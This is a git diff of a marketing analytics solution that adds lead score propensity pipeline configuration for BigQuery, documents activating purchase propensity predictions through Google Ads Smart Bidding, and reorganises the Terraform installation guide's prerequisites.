+2027,13 @@ bigquery: table_name: "churn_propensity_inference_preparation" location: "${location}" table_description: "Purchase Propensity Inference Preparation table to be used for Model Prediction" + # Table containing the feature engineered dataset that will be used for the Lead Score Propensity prediction pipeline. + lead_score_propensity_inference_preparation: + project_id: "${project_id}" + dataset: "lead_score_propensity" + table_name: "lead_score_propensity_inference_preparation" + location: "${location}" + table_description: "Lead Score Propensity Inference Preparation table to be used for Model Prediction" # Table containing the feature engineered labels that will be used for the Purchase Propensity training pipeline. purchase_propensity_label: project_id: "${project_id}" @@ -1629,13 +2041,20 @@ bigquery: table_name: "purchase_propensity_label" location: "${location}" table_description: "Purchase Propensity Label table to be used for Model Prediction" - # Table containing the feature engineered labels that will be used for the Purchase Propensity training pipeline. + # Table containing the feature engineered labels that will be used for the Churn Propensity training pipeline. churn_propensity_label: project_id: "${project_id}" dataset: "feature_store" table_name: "churn_propensity_label" location: "${location}" table_description: "Churn Propensity Label table to be used for Model Prediction" + # Table containing the feature engineered labels that will be used for the Purchase Propensity training pipeline. + lead_score_propensity_label: + project_id: "${project_id}" + dataset: "feature_store" + table_name: "lead_score_propensity_label" + location: "${location}" + table_description: "Lead Score Propensity Label table to be used for Model Prediction" # Table containing the feature engineered dimensions that will be used for the Purchase Propensity training and inference pipeline. 
user_dimensions: project_id: "${project_id}" @@ -1671,6 +2090,13 @@ bigquery: table_name: "user_rolling_window_metrics" location: "${location}" table_description: "User Rolling Window Metrics table as part of the Feature Store for Purchase Propensity use case" + # Table containing the feature engineered rolling window metrics that will be used for the Lead Score Propensity training and inference pipeline. + user_rolling_window_lead_metrics: + project_id: "${project_id}" + dataset: "feature_store" + table_name: "user_rolling_window_lead_metrics" + location: "${location}" + table_description: "User Rolling Window Lead Metrics table as part of the Feature Store for Lead Score Propensity use case" # Table containing the feature engineered all users metrics that will be used for the Customer Lifetime Value training and inference pipeline. user_scoped_lifetime_metrics: project_id: "${project_id}" @@ -1720,14 +2146,16 @@ bigquery: churn_propensity_query_template: none: none # This is a query template to be used by the Activation application, so there is no configuration to be applied. + lead_score_propensity_query_template: + none: none + # This is a query template to be used by the Activation application, so there is no configuration to be applied. cltv_query_template: none: none create_gemini_model: project_id: "${project_id}" dataset: "gemini_insights" model_name: "gemini_1_5_pro" - region: lower("${cloud_region}") - connection_name: "vertex_ai" + connection_name: "vertex_ai_conn" region: "${location}" endpoint_name: "gemini-1.5-pro-001" # This is a stored procedure that CALLs the Aggregated Value Based Bidding Training Preparation stored procedure. @@ -1735,6 +2163,26 @@ bigquery: project_id: "${project_id}" dataset: "aggregated_vbb" stored_procedure: "aggregated_value_based_bidding_training_preparation" + # This is a stored procedure that CALLs the Lead Score Propensity Training Preparation stored procedure. + invoke_lead_score_propensity_training_preparation: + project_id: "${project_id}" + dataset: "lead_score_propensity" + stored_procedure: "lead_score_propensity_training_preparation" + # The `interval_max_date` parameter defines how many days we leave out of the training dataset after the latest date in the dataset. + # This is usually the same value as the look forward window. + interval_max_date: 1 + # The `interval_min_date` parameter defines how many days we leave out of the training dataset before the first date in the dataset. + # This is usually the same value as the lookback window. + interval_min_date: 5 + # `training_split_end_number` must be smaller than `validation_split_end_number`. + # This is a number out of 10 deciles, how many rows will belong to the `data_split` = TRAIN (Between 1 and `training_split_end_number`) + train_split_end_number: 5 + # This is a number out of 10 deciles, how many rows will belong to the `data_split` = VALIDATE (Between `training_split_end_number` and `validation_split_end_number`) + # The rest of the rows will belong to the `data_split` = TEST (Between `validation_split_end_number` and 10) + validation_split_end_number: 8 + mds_project_id: "${mds_project_id}" + mds_dataset: "${mds_dataset}" + target_event: "${non_ecomm_target_event}" # This is a stored procedure that CALLs the Purchase Propensity Training Preparation stored procedure.
invoke_purchase_propensity_training_preparation: project_id: "${project_id}" @@ -1754,7 +2202,7 @@ bigquery: validation_split_end_number: 8 mds_project_id: "${mds_project_id}" mds_dataset: "${mds_dataset}" - # This is a stored procedure that CALLs the Purchase Propensity Training Preparation stored procedure. + # This is a stored procedure that CALLs the Churn Propensity Training Preparation stored procedure. invoke_churn_propensity_training_preparation: project_id: "${project_id}" dataset: "churn_propensity" @@ -1822,6 +2270,11 @@ bigquery: stored_procedure: "auto_audience_segmentation_training_preparation" # The `lookback_days` parameter is the number of days to look back for training data. lookback_days: 15 + # This is a stored procedure that CALLs the Lead Score Propensity Inference Preparation stored procedure. + invoke_lead_score_propensity_inference_preparation: + project_id: "${project_id}" + dataset: "lead_score_propensity" + stored_procedure: "lead_score_propensity_inference_preparation" # This is a stored procedure that CALLs the Purchase Propensity Inference Inference Preparation stored procedure. invoke_purchase_propensity_inference_preparation: project_id: "${project_id}" @@ -1945,6 +2398,23 @@ bigquery: # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. # This is usually the same value as the look forward window. interval_end_date: 180 + # This is a stored procedure that CALLs the Lead Score Propensity Label Backfill stored procedure. + invoke_backfill_lead_score_propensity_label: + mds_project_id: "${mds_project_id}" + mds_dataset: "${mds_dataset}" + project_id: "${project_id}" + dataset: "feature_store" + insert_table: "lead_score_propensity_label" + # The `interval_max_date` parameter defines how many days we leave out of the training dataset after the latest date in the dataset. + # This is usually the same value as the look forward window. + interval_max_date: 1 + # The `interval_min_date` parameter defines how many days we leave out of the training dataset before the first date in the dataset. + # This is usually the same value as the lookback window. + interval_min_date: 5 + # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. + # This is usually the same value as the look forward window. + interval_end_date: 5 + target_event: "${non_ecomm_target_event}" # This is a stored procedure that CALLs the Purchase Propensity Label Backfill stored procedure. invoke_backfill_purchase_propensity_label: mds_project_id: "${mds_project_id}" @@ -2014,6 +2484,26 @@ bigquery: # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. # This is usually the same value as the look forward window. interval_end_date: 30 + # This is a stored procedure that CALLs the User Rolling Window Lead Metrics Backfill stored procedure. + invoke_backfill_user_rolling_window_lead_metrics: + mds_project_id: "${mds_project_id}" + mds_dataset: "${mds_dataset}" + project_id: "${project_id}" + dataset: "feature_store" + insert_table: "user_rolling_window_lead_metrics" + # The `interval_max_date` parameter defines how many days we leave out of the training dataset after the latest date in the dataset. + # This is usually the same value as the look forward window.
+ interval_max_date: 1 + # The `interval_min_date` parameter defines how many days we leave out of the training dataset before the first date in the dataset. + # This is usually the same value as the lookback window. + interval_min_date: 5 + # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. + # This is usually the same value as the look forward window. + interval_end_date: 5 + short_list_features: + %{ for non_ecomm_event in non_ecomm_events_list ~} + - feature_name: "${non_ecomm_event}" + %{ endfor ~} # This is a stored procedure that CALLs the User Scoped Metrics Backfill stored procedure. invoke_backfill_user_scoped_metrics: mds_project_id: "${mds_project_id}" @@ -2079,6 +2569,16 @@ bigquery: # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. # This is usually the same value as the look forward window. interval_input_date: 180 + # This is a stored procedure that CALLs the Lead Score Propensity Label stored procedure. + invoke_lead_score_propensity_label: + mds_project_id: "${mds_project_id}" + mds_dataset: "${mds_dataset}" + project_id: "${project_id}" + dataset: "feature_store" + stored_procedure: "lead_score_propensity_label" + # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. + # This is usually the same value as the look forward window. + interval_input_date: 1 # This is a stored procedure that CALLs the Purchase Propensity Label stored procedure. invoke_purchase_propensity_label: mds_project_id: "${mds_project_id}" @@ -2171,6 +2671,14 @@ bigquery: # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. # This is usually the same value as the look forward window. interval_end_date: 180 + # This is a stored procedure that CALLs the User Rolling Window Metrics stored procedure. + invoke_user_rolling_window_lead_metrics: + project_id: "${project_id}" + dataset: "feature_store" + stored_procedure: "user_rolling_window_lead_metrics" + # The `interval_end_date` parameter defines how many days we leave out of the backfill before the last dates of events. + # This is usually the same value as the look forward window. + interval_end_date: 15 # This is a stored procedure that CALLs the User Scoped Metrics stored procedure. invoke_user_scoped_metrics: project_id: "${project_id}" @@ -2182,10 +2690,11 @@ bigquery: # This section sets the parameters for the features, training and inference procedures that insert data into tables and views to be used for # training and prediction. # There is no strict recommendation on the right parameters that will maximize the models performance, however here are some back of the envelope numbers. - # Purchase Propensity model: 1 month-2 years for dates interval. From Xk - 10M users. - # Customer LTV model: 6 months-2 years for dates interval. From Xk - 10M users. - # Audience Segmentation / Auto Audience Segmentation models: 1 month-1 year for dates interval. From XXX - 10M users. - # Aggregated VBB model: 1000 days - 2000 days + # Lead Score Propensity model: 2 weeks-1 year for dates interval. From Xk - 1M users. + # Purchase Propensity model: 1 month-2 years for dates interval. From Xk - 1M users. + # Customer LTV model: 6 months-2 years for dates interval. From Xk - 1M users. + # Audience Segmentation / Auto Audience Segmentation models: 1 month-1 year for dates interval. 
From XXX - 1M users. + # Aggregated VBB model: 100 days - 2000 days # Note: For Aggregated VBB, it's common to duplicate rows to that training dataset size reaches at least 1k rows for AutoML to train a model. # If that is your case, this is not a problem since typically duplicated rows has a similar effect as of training the model for more epochs. procedure: @@ -2273,6 +2782,18 @@ bigquery: expiration_duration_hours: 168 custom_start_date: "'2023-01-01'" custom_end_date: "NULL" + # This is the stored procedure that calculates the label column for the Lead Score Propensity use case. + # The label represents whether a user will perform the configured target event (e.g. `login`) over a period of time. + # Typically, looking at a period of 1 day in the future. + # The granularity level is per user per day. + lead_score_propensity_label: + project_id: "${project_id}" + dataset: "feature_store" + name: "lead_score_propensity_label" + insert_table: "lead_score_propensity_label" + mds_project_id: "${mds_project_id}" + mds_dataset: "${mds_dataset}" + target_event: "${non_ecomm_target_event}" # This is the stored procedure that calculates the label column for the Purchase Propensity use case. # The label represents wether a user will make a purchase over a period of time. # Typically, looking at a period of 15 to 30 days in the future. # The granularity level is per user per day. @@ -2285,7 +2806,7 @@ bigquery: mds_project_id: "${mds_project_id}" mds_dataset: "${mds_dataset}" # This is the stored procedure that calculates the label column for the Churn Propensity use case. - # The label represents wether a user will make a purchase over a period of time. + # The label represents whether a user will churn over a period of time. # Typically, looking at a period of 30 days in the future. # The granularity level is per user per day. churn_propensity_label: @@ -2304,6 +2825,27 @@ bigquery: # The procedure will split the data into three splits (TRAIN, VALIDATE, TEST) and will take care of avoiding splits contamination. # There is a minimum number of examples rows of 1000 and the maximum is as much as it fits in memory, overall consensus is that for ML models # you will provide at maximum a couple of millions of rows. + lead_score_propensity_training_preparation: + project_id: "${project_id}" + dataset: "lead_score_propensity" + name: "lead_score_propensity_training_preparation" + insert_table: "lead_score_propensity_training_full_dataset" + feature_store_project_id: "${project_id}" + feature_store_dataset: "feature_store" + mds_project_id: "${mds_project_id}" + mds_dataset: "${mds_dataset}" + expiration_duration_hours: 168 + custom_start_date: "'2024-01-01'" + custom_end_date: "NULL" + target_event: "${non_ecomm_target_event}" + short_list_features: + %{ for non_ecomm_event in non_ecomm_events_list ~} + - feature_name: "${non_ecomm_event}" + %{ endfor ~} + # This is the stored procedure that collects the features and prepare the examples rows to train a model. + # The procedure will split the data into three splits (TRAIN, VALIDATE, TEST) and will take care of avoiding splits contamination. + # There is a minimum number of examples rows of 1000 and the maximum is as much as it fits in memory, overall consensus is that for ML models + # you will provide at maximum a couple of millions of rows.
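+ # For example, with `train_split_end_number: 5` and `validation_split_end_number: 8` (the values used in this file), roughly deciles 1 to 5 are assigned to the TRAIN split, deciles 6 to 8 to VALIDATE and deciles 9 to 10 to TEST.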
purchase_propensity_training_preparation: project_id: "${project_id}" dataset: "purchase_propensity" @@ -2314,7 +2856,7 @@ bigquery: mds_project_id: "${mds_project_id}" mds_dataset: "${mds_dataset}" expiration_duration_hours: 168 - custom_start_date: "'2023-01-01'" + custom_start_date: "'2024-01-01'" custom_end_date: "NULL" # This is the stored procedure that collects the features and prepare the examples rows to train a model. # The procedure will split the data into three splits (TRAIN, VALIDATE, TEST) and will take care of avoiding splits contamination. @@ -2384,6 +2926,20 @@ bigquery: insert_table: "user_rolling_window_metrics" mds_project_id: "${mds_project_id}" mds_dataset: "${mds_dataset}" + # This is the stored procedure that UPSERTs new look back rolling windows metrics rows daily. + # The granularity level is per user per day. + # These metrics are used for the Lead Score Propensity use case. + user_rolling_window_lead_metrics: + project_id: "${project_id}" + dataset: "feature_store" + name: "user_rolling_window_lead_metrics" + insert_table: "user_rolling_window_lead_metrics" + mds_project_id: "${mds_project_id}" + mds_dataset: "${mds_dataset}" + short_list_features: + %{ for non_ecomm_event in non_ecomm_events_list ~} + - feature_name: "${non_ecomm_event}" + %{ endfor ~} # This is the stored procedure that UPSERTs new aggregated users metrics rows daily. # The granularity level is per day, whereas the calculations take into consideration all users. # These metrics are used for the Customer Lifetime Value use case. @@ -2435,6 +2991,20 @@ bigquery: mds_project_id: "${mds_project_id}" mds_dataset: "${mds_dataset}" # This is the stored procedure that collects the features and prepare the examples rows for daily prediction. + lead_score_propensity_inference_preparation: + project_id: "${project_id}" + mds_dataset: "${mds_dataset}" + dataset: "lead_score_propensity" + name: "lead_score_propensity_inference_preparation" + feature_store_project_id: "${project_id}" + feature_store_dataset: "feature_store" + insert_table: "lead_score_propensity_inference_preparation" + expiration_duration_hours: 168 + short_list_features: + %{ for non_ecomm_event in non_ecomm_events_list ~} + - feature_name: "${non_ecomm_event}" + %{ endfor ~} + # This is the stored procedure that collects the features and prepare the examples rows for daily prediction. 
purchase_propensity_inference_preparation: project_id: "${project_id}" mds_dataset: "${mds_dataset}" diff --git a/docs/activation.md b/docs/activation.md index 79e42d00..5bc51095 100644 --- a/docs/activation.md +++ b/docs/activation.md @@ -38,12 +38,14 @@ For each use case, a corresponding SQL query template dictates how prediction va | Use Case | Query Template | | -------- | --------- | | Purchase Propensity | [purchase_propensity_query_template.sqlx](../templates/activation_query/purchase_propensity_query_template.sqlx)| +| Purchase Propensity for Smart Bidding | [purchase_propensity_vbb_query_template.sqlx](../templates/activation_query/purchase_propensity_vbb_query_template.sqlx)| | Customer Lifetime Value | [cltv_query_template.sqlx](../templates/activation_query/cltv_query_template.sqlx) | | Demographic Audience Segmentation | [audience_segmentation_query_template.sqlx](../templates/activation_query/audience_segmentation_query_template.sqlx) | | Interest based Audience Segmentation | [auto_audience_segmentation_query_template.sqlx](../templates/activation_query/auto_audience_segmentation_query_template.sqlx) | | Churn Propensity | [churn_propensity_query_template.sqlx](../templates/activation_query/churn_propensity_query_template.sqlx)| -The [activation configuration](../templates/activation_type_configuration_template.tpl) file links the GA4 custom events with their corresponding query templates and [GA4 Measurement Protocol payload template](../templates/app_payload_template.jinja2) +**Note:** The dynamic fields in the query template need to be prefixed with `user_prop_` or `event_param_` in order for the activation process to parse the values into the Measurement Protocol payload. + The payload have the following keys set based on the [payload reference documentation](https://developers.google.com/analytics/devguides/collection/protocol/ga4/reference#payload_post_body): @@ -164,7 +166,117 @@ To build your custom audience, follow the [Create an audience guide](https://sup Now you have a custom audience that is automatically updated as new activation events are sent by the activation process. This custom audience can then be used for targeted remarketing campaigns in Google Ads or other platforms. Follow the [Share audiences guide](https://support.google.com/analytics/answer/12800258) to learn how to export your audience for use in external platforms. -**Important:** If you are using User Data Import only use the customer user properties and remove the custom event filtering. +**Important:** If you are using User Data Import only use the customer user properties and remove the custom event filtering. + +## Activation through Smart Bidding Strategy +To activate purchase propensity predictions via [Smart Bidding Strategy](https://support.google.com/google-ads/answer/7065882), we translate predicted decile segments into monetary values, sent as conversion events to GA4. This allows you to use Google Ads strategies for [maximizing conversion value](https://support.google.com/google-ads/answer/7684216) and [target ROAS](https://support.google.com/google-ads/answer/6268637) with custom event values as the target. + +This also allows you to use [Search Ads 360 bid strategies](https://support.google.com/searchads/answer/6231813?hl=en). + +### Configure translation values +This section explains how to configure the translation of purchase propensity predictions into monetary values for Smart Bidding.
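
As an illustrative sketch (not one of the shipped templates), the end result of this configuration can be previewed with a BigQuery query along the following lines; it assumes the configuration has already been loaded into the `activation.vbb_activation_configuration` table (see the Upload configuration section below) and that the loaded table keeps the same field names and array-of-records shape as the JSONL file:

```sql
-- Illustrative sketch only: preview the conversion value each decile would send to GA4,
-- computed as value_norm * multiplier for the purchase-propensity activation type.
-- Assumes activation.vbb_activation_configuration mirrors templates/vbb_activation_configuration.jsonl.
SELECT
  dm.decile,
  dm.multiplier,
  c.value_norm,
  c.value_norm * dm.multiplier AS conversion_value
FROM `activation.vbb_activation_configuration` AS c,
  UNNEST(c.decile_multiplier) AS dm
WHERE c.activation_type = 'purchase-propensity'
ORDER BY dm.decile;
```

Deciles whose `multiplier` is 0 yield a conversion value of 0 and are excluded from Smart Bidding, as explained below.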
+ +#### Understanding the Configuration File: +The [vbb_activation_configuration.jsonl](../templates/vbb_activation_configuration.jsonl) file controls how predicted deciles are converted into monetary values. It contains two key fields: + +- `value_norm`: Represents the typical or average transaction value for your GA4 property. This provides a baseline for calculating monetary values. +- `decile_multiplier`: An array of multipliers, one for each decile. These multipliers determine how much each decile is valued relative to the `value_norm`. + +#### Configuration Steps: + +1. Set `value_norm`: + - Open the [vbb_activation_configuration.jsonl](../templates/vbb_activation_configuration.jsonl) file. + - Locate the entry where `"activation_type":"purchase-propensity"`. + - Modify the `value_norm` field to reflect the average transaction value specific to your GA4 property. For example, if your average transaction value is $200, set `value_norm` to 200. + +1. Set `decile_multiplier`: + - For each decile (1 through 10), adjust the `multiplier` value to reflect how much you value users in that decile. + - A higher multiplier signifies a higher value. For example, a multiplier of 3.5 for decile 1 means you value users in that decile 3.5 times more than the average customer. + +**Important**: To exclude lower-value deciles from smart bidding, set their `decile_multiplier` to 0. This prevents predictions for those deciles from being sent to GA4. + +**Calculate multiplier example:** +The following example provides a way to use quantitative analysis to derive the multiplier value for each decile. The query uses the prediction result table, which contains purchase propensity predictions and associated user data. +```sql +WITH + base AS ( + SELECT + user_ltv_revenue, + NTILE(10) OVER (ORDER BY prediction_prob DESC) AS p_p_decile, + FROM + `purchase_propensity.predictions_YYYY_MM_DDTHH_mm_ss_xxxx_xxx_view`), + segments_ltv AS ( + SELECT + SUM(user_ltv_revenue) AS seg_total_revenue, + AVG(user_ltv_revenue) AS avg_seg_revenue, + p_p_decile + FROM + base + GROUP BY + p_p_decile), + total_avg AS ( + SELECT + AVG(user_ltv_revenue) AS avg_revenue + FROM + base + WHERE + p_p_decile IS NOT NULL) +SELECT + sg.*, + sg.avg_seg_revenue/t.avg_revenue AS multiplier +FROM + segments_ltv AS sg, + total_avg AS t +ORDER BY + sg.p_p_decile ASC +``` +The SQL query calculates the `multiplier` by dividing `avg_seg_revenue` (average revenue per decile) by `avg_revenue` (overall average revenue). + +In the example, the `user_ltv_revenue` field is used, but you can replace it with other relevant numeric metrics depending on your business goals. For example, if the goal is to maximize conversions, the query could use a conversion value metric instead. The key is to choose a metric that aligns with the desired optimization strategy. + +**Example:** +```json +{"activation_type":"purchase-propensity","value_norm":150,"decile_multiplier":[{"decile":1,"multiplier":5.5},{"decile":2,"multiplier":3},{"decile":3,"multiplier":2},{"decile":4,"multiplier":1},{"decile":5,"multiplier":0},{"decile":6,"multiplier":0},{"decile":7,"multiplier":0},{"decile":8,"multiplier":0},{"decile":9,"multiplier":0},{"decile":10,"multiplier":0}]} +``` +In this example: +- The average transaction value (`value_norm`) is set to $150. +- Users in the top decile are valued 5.5 times higher than the average customer. +- Deciles 5 through 10 are excluded from smart bidding (`multiplier` is 0). + +**Important**: +- Maintain the exact formatting of the JSON file.
Do not add extra lines or commas as this will cause errors when importing the configuration into BigQuery. +- The formula for calculating the final monetary value for each decile is: `value_norm * decile_multiplier`. + +### Upload configuration +This section outlines the process of uploading your Smart Bidding configuration to Google Cloud Storage (GCS) and then loading it into BigQuery for use in the activation pipeline. + +1. Run terraform apply to upload the configuration into the GCS bucket: + ``` + cd infrastructure/terraform + terraform apply -target=module.activation[0].google_storage_bucket_object.vbb_activation_configuration_file + ``` +1. Run the [load_vbb_activation_configuration](https://console.cloud.google.com/bigquery?ws=!1m5!1m4!6m3!1s!2sactivation!3sload_vbb_activation_configuration) stored procedure to load the configuration into BigQuery + +1. Check the configuration in the [vbb_activation_configuration](https://console.cloud.google.com/bigquery?ws=!1m5!1m4!4m3!1s!2sactivation!3svbb_activation_configuration) BigQuery table + +### Send Smart Bidding activation events to GA4 +You can manually trigger an activation pipeline execution for the Smart Bidding action by following the [activation triggering process](#activation-process-triggering), where you set the `activation_type` value to `purchase-propensity-vbb-30-15` + +To configure the prediction pipeline to automatically trigger the activation pipeline for Smart Bidding, change the pipeline configuration parameter in [config.yaml.tftpl](../config/config.yaml.tftpl): +set `vertex_ai.pipelines.purchase_propensity.prediction.pipeline_parameters.pubsub_activation_type` to `purchase-propensity-vbb-30-15` +and re-apply terraform to redeploy the pipeline: + ``` + cd infrastructure/terraform + terraform apply -target=module.pipelines[0].null_resource.compile_purchase_propensity_prediction_pipelines + ``` + +### Google Analytics configuration +After the activation events have been sent, it will take roughly 24 hours for them to appear in the `Admin -> Events` view. Once you see `maj_purchase_propensity_vbb_30_15` showing up in the event list, mark it as a key event. +![Mark key event](images/vbb_mark_key_event.png) + +### Google Ads configuration + +Follow the [Set up Smart Bidding](https://support.google.com/google-ads/answer/10893605) guide to configure the bidding strategy to optimize for conversion value with `maj_purchase_propensity_vbb_30_15` as the conversion event. ## Monitoring & Troubleshooting The activation process logs all sent Measurement Protocol messages in log tables within the `activation` dataset in BigQuery. This includes both successful and failed transmissions, allowing you to track the progress of the activation, get number of events sent to GA4 and identify any potential issues. diff --git a/docs/data_store.md b/docs/data_store.md index 70a4b05e..f015d357 100644 --- a/docs/data_store.md +++ b/docs/data_store.md @@ -107,12 +107,11 @@ To deploy the Marketing Data Store, follow the pre-requisites and instructions i Next, after creating the Terraform variables file by making a copy from the template, set the Terraform variables to create the environments you need for Dataform. ```bash -create_dev_environment = false -create_staging_environment = false -create_prod_environment = true +deploy_dataform = true +property_id = "PROPERTY_ID" ``` -When the `create_dev_environment` variable is set to `true`, a development environment will be created. When the `create_staging_environment` variable is set to `true`, a staging environment will be created.
When the `create_prod_environment` variable is set to `true`, a production environment will be created. +When the `deploy_dataform` variable is set to `true`, a Dataform workspace will be created. ![Dataform Repository](images/data_store_dataform_github_repository.png) After deploying the Marketing Data Store, the repository called `marketing_analytics` is created in Dataform. diff --git a/docs/images/YoutubeScreenshot.png b/docs/images/YoutubeScreenshot.png new file mode 100644 index 00000000..90f211a8 Binary files /dev/null and b/docs/images/YoutubeScreenshot.png differ diff --git a/docs/images/vbb_mark_key_event.png b/docs/images/vbb_mark_key_event.png new file mode 100644 index 00000000..fcc0a8e2 Binary files /dev/null and b/docs/images/vbb_mark_key_event.png differ diff --git a/infrastructure/README.md b/infrastructure/README.md index 07ec98cc..51e5c9d3 100644 --- a/infrastructure/README.md +++ b/infrastructure/README.md @@ -1,20 +1,71 @@ -# Marketing Analytics Jumpstart Installation Guide +# Marketing Analytics Jumpstart Step-by-Step Installation Guide ## Overview Marketing Analytics Jumpstart consists of several components - marketing data store (MDS), feature store, ML pipelines, -the activation pipeline and dashboards. This document describes the sequencing of installing these components. +the activation pipeline and dashboards. -## Prerequisites +This document describes the permission and data prerequisites for a successful installation and provides you with two routes to install the solution. These are designed for advanced users of the Marketing Analytics Jumpstart solution. + +**1) Guided Installation Tutorial of Terraform Modules on Cloud Shell** + + This route allows you to install and manage the solution components using our cloud-based developer workspace. You can tailor the solution components to your needs and use only a subset of them. For instance, developers wanting to reuse their existing Marketing Data Store will prefer this installation method. + +**2) Manual Installation of Terraform Modules** + + This route allows you to install and manage the solution in any workspace (cloud, local machine, Compute Engine instance). This is the preferred method for users who are contributing to and extending this solution to implement new features or adapt it to specific business needs. Take this route as well if you need to manage installations across multiple brands, tenants or regions in a comprehensive manner. + +Once you have chosen your route, check the permissions and data prerequisites in detail. + +**Note:** If none of these routes are ideal for you, run this [installation notebook πŸ“”](https://colab.sandbox.google.com/github/GoogleCloudPlatform/marketing-analytics-jumpstart/blob/main/notebooks/quick_installation.ipynb) on Google Colaboratory and leverage Marketing Analytics Jumpstart in under 30 minutes. + +## Permissions Prerequisites + +### Permissions to deploy infrastructure and access source data + +There are multiple ways to configure Google Cloud authentication for the Terraform installations. Terraform's Google +Provider [documentation](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) +lists all possible options on how the authentication can be done. This installation guide assumes that you will be using the +Application Default Credentials.
You can change this by, for example, creating a dedicated service account and +setting `GOOGLE_IMPERSONATE_SERVICE_ACCOUNT` environment variable before you run Terraform scripts. We will refer to the +identity which is used in the Terraform scripts (your email or the dedicated service account email) as the "Terraform +principal" for brevity. + +The Terraform principal will need to be granted certain permissions in different projects: + +* the Owner role in all projects where the solution is to be installed. Required to install products related to the + solution. +* the BigQuery [Data Owner role](https://cloud.google.com/bigquery/docs/control-access-to-resources-iam#required_roles) + on the datasets containing the GA4 and Ads data exports. Required to grant data read access to + a service account which will be created by the Terraform scripts. Follow the + BigQuery [documentation](https://cloud.google.com/bigquery/docs/control-access-to-resources-iam#grant_access_to_a_dataset) + on how to grant this permission on a dataset level. + +### Google Analytics 4 Configurations and Permissions + +The activation application uses sensitive information from the Google Analytics property, such as the Measurement ID and API Secret. This information is stored temporarily in environment variables that are exported manually by the user. + +* A [Measurement ID](https://support.google.com/analytics/answer/12270356?hl=en) and [API secret](https://support.google.com/analytics/answer/9814495?sjid=9902804247343448709-NA) collected from the Google Analytics UI. In this [article](https://support.google.com/analytics/answer/9814495?sjid=9902804247343448709-NA) you will find instructions on how to generate the API secret. +* Editor or Administrator role to the Google Analytics 4 account or property. In this [article](https://support.google.com/analytics/answer/9305587?hl=en#zippy=%2Cgoogle-analytics) you will find instructions on how to set it up. + +## Data Prerequisites + +### Recommended data location ### Marketing Analytics Data Sources * Set up Google Analytics 4 Export to Bigquery. Please follow the - set-up [documentation](https://support.google.com/analytics/answer/9358801?hl=en). The current version of MDS doesn't - use streaming export tables. + set-up [documentation](https://support.google.com/analytics/answer/9358801?hl=en). Note that the current version of MDS doesn't + support streaming export tables. + + [![Google Analytics 4 BigQuery Export](https://img.youtube.com/vi/u4QlVsNh2Q4/0.jpg)](https://youtube.com/clip/Ugkxo955w1NlF8o5_EZmMdQO7UsxcFxnGt3j?si=zf1X4iEq_8IY_fu2) + + * Set up Google Cloud Data Transfer Service to export Google Ads to Bigquery. Follow these [instructions](https://cloud.google.com/bigquery/docs/google-ads-transfer). + [![Google Ads BigQuery Data Transfer](https://img.youtube.com/vi/svPy0o9r7eI/0.jpg)](https://youtube.com/clip/Ugkx9VT3yyM0GPwDXVVKcBMs2i7qbUmtOH74?si=p6MBZJE32x4EX8bT) + Make sure these exports use the same BigQuery location, either regional or multi-regional one. You can export the data into the same project or different projects - the MDS will be able to get the data from multiple projects. @@ -33,26 +84,6 @@ access control is desired multiple projects can be used: to accelerate the query originated from the dashboard. -### Permissions to create infrastructure and access source data - -There are multiple ways to configure Google Cloud authentication for the Terraform installations.
Terraform's Google -Provider [documentation](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider_reference) -lists all possible options on how the authentication can be done. This installation guide assumes that will be using the -Application Default Credentials. You can change this by, for example, creating a dedicated service account and -setting `GOOGLE_IMPERSONATE_SERVICE_ACCOUNT` environment variable before you run Terraform scripts. We will refer to the -identity which is used in the Terraform scripts (your email or the dedicated service account email) the "Terraform -principal" for brevity. - -The Terraform principal will need to be granted certain permissions in different projects: - -* the Owner role in all projects where the solution is to be installed. Required to install products related to the - solution. -* the BigQuery [Data Owner role](https://cloud.google.com/bigquery/docs/control-access-to-resources-iam#required_roles) - on the datasets containing the GA4 and Ads data exports. Required to grant data read access to - a service account which will be created by the Terraform scripts. Follow the - BigQuery [documentation](https://cloud.google.com/bigquery/docs/control-access-to-resources-iam#grant_access_to_a_dataset) - on how to grant this permission on a dataset level. - ### Dataform Git Repository MDS uses [Dataform](https://cloud.google.com/dataform) as the tool to run the data transformation. Dataform uses a @@ -78,28 +109,27 @@ copy the SQL scripts from a companion GitHub repo before running the Terraform s cd .. rm -rf marketing-analytics-jumpstart-dataform ``` -6. Generate a GitHub personal access token. It will be used by Dataform to access the repository. For details and +6. Generate a [GitHub personal access token](https://cloud.google.com/dataform/docs/connect-repository#connect-https). It will be used by Dataform to access the repository. For details and additional guidance regarding token type, security and require permissions see [Dataform documentation](https://cloud.google.com/dataform/docs/connect-repository#create-secret). You don't need to create a Cloud Secret - it will be done by the Terraform scripts. You will need to provide the Git URL and the access token to the Terraform scripts using a Terraform variable. -### Google Analytics 4 Configurations and Permissions +## Guided Installation Tutorial of Terraform Modules on Cloud Shell -The activation application uses sensitive information from the Google Analytics property, such as Measurement ID and API Secret. These information is stored temporarily on environment variables to be exported manually by the user. +Once all the permissions and data prerequisites are met, you can install these components following the step by step installation guide using the Cloud Shell Tutorial, by clicking the button below. -* A [Measurement ID](https://support.google.com/analytics/answer/12270356?hl=en) and [API secret](https://support.google.com/analytics/answer/9814495?sjid=9902804247343448709-NA) collected from the Google Analytics UI. In this [article](https://support.google.com/analytics/answer/9814495?sjid=9902804247343448709-NA) you will find instructions on how to generate the API secret. -* Editor or Administrator role to the Google Analytics 4 account or property. In this [article](https://support.google.com/analytics/answer/9305587?hl=en#zippy=%2Cgoogle-analytics) you will find instructions on how to setup. 
